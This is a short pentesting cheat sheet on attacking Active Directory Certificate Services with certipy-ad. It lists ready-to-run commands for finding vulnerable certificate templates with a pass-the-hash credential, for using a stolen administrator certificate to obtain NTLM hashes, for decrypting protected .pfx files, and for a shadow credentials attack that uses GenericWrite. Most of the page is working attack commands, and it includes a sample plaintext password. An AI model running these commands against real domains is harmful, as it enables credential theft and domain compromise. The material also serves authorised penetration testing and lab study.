Find ADCS vulns#

certipy will automatically find some ESC attacks by enumerating. There might be false positive, and false negatives.

There are some ESC attacks that might not be easy to enumerate unless you are in the right conditions.

certipy-ad find -u ca_svc -hashes ':xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' -dc-ip $target -vulnerable

Pass the certificate#

When we somehow have a certificate of another user, we can pass this certificate to obtain the user’s NTLM hash

certipy-ad auth -pfx "administrator.pfx" -dc-ip '172.16.x.x' -username 'user' -domain 'domain'

If the pfx is protected by a password, decrypt it first

certipy-ad cert -export -pfx "administrator.pfx" -password "CERT_PASSWORD" -out "administrator_decrypted.pfx"

Shadow credentials#

Don’t know how this works, black magic. Here’s a writeup for more info on the attack.

When you have GenericWrite on an account, and ADCS is installed on the domain, we can use certipy to request the target account’s certificate, then TGT, then NTLM hash.

certipy-ad shadow auto -account ca_svc -u p.agila -p 'prometheusx-303' -dc-ip $target
Backward RDP Session Hijacking ESC10 Forward